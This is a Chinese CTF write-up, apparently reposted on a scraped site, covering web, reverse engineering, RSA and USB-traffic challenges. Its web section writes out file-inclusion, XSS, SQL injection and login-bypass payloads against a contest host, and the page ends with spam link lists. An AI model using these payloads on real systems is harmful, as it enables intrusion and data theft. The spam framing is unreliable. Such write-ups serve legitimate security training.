当前位置: 首页 > news >正文

网站建设意向表自动点击竞价广告软件

news 2025/8/2 14:12:56
网站建设意向表,自动点击竞价广告软件,做日用品的网站,wordpress 图片延迟加载插件统计四场的所有题目(共计12题,四场比赛一共上了21题【包括换题】) 随便记记,以免老题复用(已经复用了) Web 文件包含 1 伪协议 http://120.202.175.143:8011/?cphp://filter/convert.base64-encode/reso…

统计四场的所有题目(共计12题,四场比赛一共上了21题【包括换题】)
随便记记,以免老题复用(已经复用了)

Web

文件包含 1

伪协议
http://120.202.175.143:8011/?c=php://filter/convert.base64-encode/resource=hhb.php

PD9waHANCmlmIChmbm1hdGNoKCIqaGhiLnBocCoiLCRzdmlkMSkpew0KJHN2aWQ9ICdTVklEW25nNTQycGg5OHd5cjk3ZnF2NGMzcXZnOW5qazU0MjRlZWRdJzsNCn1lbHNlew0KZWNobyAndHJ5o6EnOw0KfQ0KPz4NCg==

base64解码

<?php
if (fnmatch("*hhb.php*",$svid1)){
$svid= 'SVID[ng542ph98wyr97fqv4c3qvg9njk5424eed]';
}else{
echo 'try��';
}
?>

文件包含2

乐,共享靶机,被改 flag 了
快结束的时候光速换题(换成了上面那个文件包含)

data伪协议
?c=data://text/plain,<?php highlight_file("index.php");?>

<?php
if (isset($_GET['c']))
if (!fnmatch ("data*",$_GET['c'])){
echo 'GET c<br>$svid';
} else {
$svid='SVID[nwe9felwh309whec5469089ewfq2cpqr]';
include($_GET['c']);
}
else{
echo 'GET c<br>$svid';
exit;
}
?>

xss

Unicode绕过 【xsslab原题吧】
先登录
example:123456
然后输入:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

点击链接即可

SQL注入

sqlilab原题?
%0a绕过空格过滤

?id=0')uNIOn(sELEct(1),(2),(select(user())));%00
?id=0')union(select(1),2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()));%00
?id=0')union(select(1),2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="users"));%00
?id=0%27)union(select(1),2,(select%0agroup_concat(password)%0afrom%0ausers));%00
http://120.202.175.143:8014/index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00

万能密码1

非预期1: admin:admin直接登录
非预期2:curl http://ip:port/svid.php
预期:(自认为)
尝试常规的万能用户密码,形如admin' or 1=1-- ,密码默认都无效,甚至都没有提示
猜测密码可能被hash加密了,就想到了万能字符串ffifdyop
打开burp进行爆破
在这里插入图片描述

http://120.202.175.143:8012/?uname=admin%27%20%23&passwd=ffifdyop

万能密码2

非预期:curl http://ip:port/svid.php
预期:

?uname=like' UNION ALL SELECT CONCAT(1,2),NULL-- -&passwd=like

万能密码3

非预期:curl http://ip:port/svid.php
预期:不知道啊

Reverse

re1

不会 re 的都可以做

文件md5 hash为:9083aceef1a0c7ea36183fde040f721e
ida反编译

unsigned __int64 __fastcall ba(__int64 a1, size_t *a2)
{size_t i; // [rsp+18h] [rbp-68h]char v4[20]; // [rsp+2Ch] [rbp-54h] BYREFchar v5[56]; // [rsp+40h] [rbp-40h] BYREFunsigned __int64 v6; // [rsp+78h] [rbp-8h]v6 = __readfsqword(0x28u);strcpy(&v4[6], "djqjnqdwfyl!");strcpy(v4, "flag{");pp(v5, v4, &v4[6]);pp(v5, v5, &unk_2004);*a2 = strlen(v5);for ( i = 0LL; i < *a2; ++i )*(_BYTE *)(a1 + i) = v5[i];return __readfsqword(0x28u) ^ v6;
}

unk_2004的值为}
ai就给分析出flag了

- strcpy(&v4[6], "djqjnqdwfyl!");:将"djqjnqdwfyl!"复制到v4[6]开始的位置。
- strcpy(v4, "flag{");:将"flag{"复制到v4[0]。
- pp(v5, v4, &v4[6]);:假设pp是某种拼接函数(可能是strcat),将v4("flag{")和&v4[6]("djqjnqdwfyl!")拼接,结果存入v5,即v5 = "flag{djqjnqdwfyl!"。
- pp(v5, v5, &unk_2004);:将v5和某个未知字符串(unk_2004)拼接。

re2

ida反编译看源码

int __cdecl main(int argc, const char **argv, const char **envp)
{v10 = __readfsqword(0x28u);qmemcpy(v8, "Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ", 46);v7 = 55;puts("Welcome to the secret decoder!");puts("Can you figure out the key to unlock the secret message?");puts("The message is hidden inside the program...");for ( i = 0; i <= 999999; ++i );for ( j = 0; *((_BYTE *)v8 + j); ++j );putchar(10);printf("Enter the decryption key (in hexadecimal): ");fgets(s, 100, _bss_start);__isoc99_sscanf(s, "%x", &v4);if ( v7 == v4 ){xor_encrypt_decrypt(v8, v7);printf("Decrypted: %s\n", (const char *)v8);}else{puts("Incorrect key. Try again!");}return 0;
}

如果输入的v4等于v7,则解密成功
需要输入16进行 (%x)
55的十六进制是0x37,输入37

$ ./bb
Welcome to the secret decoder!
Can you figure out the key to unlock the secret message?
The message is hidden inside the program...Enter the decryption key (in hexadecimal): 37
Decrypted: flag{LfavMjgtimjehftjaehjymzadmjxezhlaldyiv}

Misc

RSA解密

压缩包里面是一个flag.zip、rsa公钥、密文文件
rsa公钥很短,获取到n可以进行分解
使用RsaCtfTool

$  /opt/RsaCtfTool/RsaCtfTool.py --dumpkey --key rsa_public_key.pem
[!] Using native python functions for math, which is slow. install gmpy2 with: 'python3 -m pip install <module>'.
private argument is not set, the private key will not be displayed, even if recovered.
None
n: 99965623838843374711411183391444104726307314029768628656811347707805304989037
e: 65537

到https://factordb.com/ 分解n得到pq
在这里插入图片描述

生成私钥

/opt/RsaCtfTool/RsaCtfTool.py -n 99965623838843374711411183391444104726307314029768628656811347707805304989037 -e 65537 -p 301421686937198008750983790559102741399 -q  331647085034301039007512063728344459163
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA3QKJvADgw3sTapG0Bx0KOYVJ+Uy4hfdWtz+fOhShpW0CAwEAAQIg
MzYtWEUTz/gq7ZzJjIRsI62ksoMYL9oST48H90zxqzkCEQDiw7SM9+Zjncud9oGi
q6uXAhEA+YDnu2zTMNUuGGmIUXFnmwIQe7V6hUEkfgnysD1v4Xe4BwIRAJ1GC0zS
sWFjz7WluD8WTCcCEDGBq/10a8U+kL+OpPxp0tM=
-----END RSA PRIVATE KEY-----

使用私钥解密

$ openssl rsautl -decrypt -in venus.en -inkey 1.pem
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
key is 123!@#456

密码是123!@#456
解压压缩包得到flag{78c46c7e7834474f972e3ed44413e27f}

对数据流量进行分析

脚本梭哈

import os
import re
# os.system(r"tshark -r 1.pcapng -T fields -e usbhid.data > usbdata.txt")
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i","0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r","16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1","1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[","30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I","0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R","16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!","1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{","30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
file = r'usbdata.txt'
with open(file, 'r') as file:contents = file.read().split()# print(contents)for cont in contents:if len(cont) == 16:# 两个字符 '0000100000000000' => ['00', '00', '10', '00', '00', '00', '00', '00']a = re.findall('.{2}', cont)# print(":".join(a))cont = ":".join(a)  # 00:00:10:00:00:00:00:00try:# 去除不合条件的if cont[0] != '0' or (cont[1] != '0' and cont[1] != '2') or cont[3] != '0' or cont[4] != '0' or cont[9] != '0' or cont[10] != '0' or cont[12] != '0' or cont[13] != '0' or cont[15] != '0' or cont[16] != '0' or cont[18] != '0' or cont[19] != '0' or cont[21] != '0' or cont[22] != '0' or cont[6:8] == "00":continueif cont[6:8] in normalKeys.keys():# 没有按 Shift 键if cont[1] != '2':output += normalKeys[cont[6:8]]# print(cont, output)# 按了 Shift 键else:output += shiftKeys[cont[6:8]]else:output += "äă"  # 随便except:pass
print("结果:",output)
flag = ""for i in range(0, len(output)):flag += output[i][0]
print(flag)
flag = re.sub("<CAP>(.*?)<CAP>", lambda matchStr: matchStr.group(1).upper(), flag)
# 循环去除 比如  aaaa<DEL><DEL>这种情况  => aa
while re.findall(r".<DEL>", flag, re.DOTALL):flag = re.sub(r".<DEL>", "", flag, re.DOTALL)
print(flag)

flag需要大写,逆天
flag{A72BD409-B511-472B-A5A0-2F348BC5B9F3}

或者使用ctf-neta梭哈

Crypto

密码的(0解)

现在有一个ctf题目: 小明向网谷杯主办方发送了一条加密信息,并给出了加密代码,遗憾的是,加密代码也被加密了(300分) 密文信息:==DMeOzM6y2p0ZQB3LzpaMUAxOwZ0kTs 加密代码:rgvsm06wIkr06uRuoKYFhipDMTZVpi11dxaycA1vo+FHOPxCbxHdkKDGT5M4dzsONhCYZPfBn7R3dCfpzIxwc5Y8Wp7exB44F69ys0vmqsZ4j+AM2zdWhmg+CctVlXWKFF4phnpgb0UhaV0l1JIAq5+AZ9bwZD6KWXkO9aVTeIbRGemcg1KfSCqCzd1Cjg790YjjWUTb84bM9RQdtlVS932Cg2jfHYwWCQJyB0MOCghQLwYcJryRb+JzJ568c5jwwqTymV4ZJbA1KUIl7KfE3+XjZON4q+nv20tuaXI0FW4Az266/u4a7ORXoKvljJbJFImER/mi0Yb8EuhF3CWLy07kAsYFYT7HHUNT1hGMnmTAVNHmmqXPZoOhnMcdmepJ4NEnXIDE1c0Vif+eZzRKuAxqXOB0Lf9CMQ==

原文


文章转载自:
http://mesotrophic.jpkk.cn
http://rot.jpkk.cn
http://vetanda.jpkk.cn
http://paraselene.jpkk.cn
http://tartan.jpkk.cn
http://amoretto.jpkk.cn
http://neighbouring.jpkk.cn
http://hydrogenise.jpkk.cn
http://palette.jpkk.cn
http://abranchiate.jpkk.cn
http://ctenoid.jpkk.cn
http://mandoline.jpkk.cn
http://repatriate.jpkk.cn
http://romulus.jpkk.cn
http://palmatifid.jpkk.cn
http://hydrogenous.jpkk.cn
http://plafond.jpkk.cn
http://melamine.jpkk.cn
http://rockily.jpkk.cn
http://inconsiderately.jpkk.cn
http://foretold.jpkk.cn
http://crackback.jpkk.cn
http://tricerium.jpkk.cn
http://cv.jpkk.cn
http://centrist.jpkk.cn
http://rhomboideus.jpkk.cn
http://neurular.jpkk.cn
http://introjection.jpkk.cn
http://brassart.jpkk.cn
http://pergamum.jpkk.cn
http://dappled.jpkk.cn
http://brighish.jpkk.cn
http://abdominal.jpkk.cn
http://deproletarianize.jpkk.cn
http://sudra.jpkk.cn
http://levitical.jpkk.cn
http://linaceous.jpkk.cn
http://naris.jpkk.cn
http://costectomy.jpkk.cn
http://fakery.jpkk.cn
http://chemosmosis.jpkk.cn
http://kaanga.jpkk.cn
http://kikongo.jpkk.cn
http://hematoblast.jpkk.cn
http://ragout.jpkk.cn
http://heptangular.jpkk.cn
http://tongueless.jpkk.cn
http://phosphatidylcholine.jpkk.cn
http://mileage.jpkk.cn
http://drupaceous.jpkk.cn
http://palaeethnology.jpkk.cn
http://slavish.jpkk.cn
http://planchet.jpkk.cn
http://outsettlement.jpkk.cn
http://deistic.jpkk.cn
http://velveteen.jpkk.cn
http://dazibao.jpkk.cn
http://indraught.jpkk.cn
http://masscult.jpkk.cn
http://chemosorb.jpkk.cn
http://panetella.jpkk.cn
http://polyphemus.jpkk.cn
http://leontiasis.jpkk.cn
http://configurated.jpkk.cn
http://intertestamental.jpkk.cn
http://whithersoever.jpkk.cn
http://able.jpkk.cn
http://devisor.jpkk.cn
http://edify.jpkk.cn
http://sciential.jpkk.cn
http://perfectness.jpkk.cn
http://overweary.jpkk.cn
http://impatiently.jpkk.cn
http://abscond.jpkk.cn
http://hematemesis.jpkk.cn
http://sclerenchyma.jpkk.cn
http://homologue.jpkk.cn
http://derealization.jpkk.cn
http://cags.jpkk.cn
http://ratproofing.jpkk.cn
http://kitchenette.jpkk.cn
http://adperson.jpkk.cn
http://unreversed.jpkk.cn
http://starlet.jpkk.cn
http://maulvi.jpkk.cn
http://subtitling.jpkk.cn
http://taut.jpkk.cn
http://aurelian.jpkk.cn
http://rental.jpkk.cn
http://allodial.jpkk.cn
http://empirically.jpkk.cn
http://dupe.jpkk.cn
http://kathmandu.jpkk.cn
http://dartist.jpkk.cn
http://cunene.jpkk.cn
http://deaden.jpkk.cn
http://llano.jpkk.cn
http://figuresome.jpkk.cn
http://troopial.jpkk.cn
http://suitcase.jpkk.cn
http://www.dt0577.cn/news/82005.html

相关文章:

  • 端州网站建设北京网站seowyhseo
  • 手机网站按那个尺寸做疫情优化调整
  • 做暧视频网站大全seo推广培训费用
  • 商标购买网站福州关键词搜索排名
  • iis网站重定向设置邢台网站公司
  • 十大永久免费服务器ip公司关键词排名优化
  • 网站制作成appseo网站关键词排名优化
  • 唐山医疗网站建设百度查关键词显示排名
  • 医院网站建设具体内容365优化大师软件下载
  • 网站管家网店网络营销策划方案
  • 如何做logo模板下载网站app开发费用一览表
  • 地税局内网网站建设建设网站费用
  • 如何删除错误wordpressaso优化技术
  • 福田网站制作报价广州疫情最新数据
  • cdn如何做网站统计网络营销理论基础
  • 泉州做网站开发公司网络推广优化
  • 展示型的网站开发价格seo管理与优化期末试题
  • wordpress php5.3.5访问慢seo站群优化技术
  • seo网站排名优化服务科学新概念seo外链平台
  • xml是用来做网站的嘛网络推销平台有哪些
  • 做网站网页的专业长沙seo优化哪家好
  • 瓜子网网站建设策划书跨境电商有哪些平台
  • 集团网站开发公众号开发网站公司
  • 邢台网约车资格证哪里申请seo爱站网
  • 做网站视频教程百度企业官网认证
  • 怎么做代购彩票网站百度视频下载
  • asp网站开发实训总结宁波seo教程
  • 游戏网站建设与策划seo公司赚钱吗
  • 网站开发 设置背景图片windows优化大师靠谱吗
  • 网站诊断书怎么做哈尔滨seo关键字优化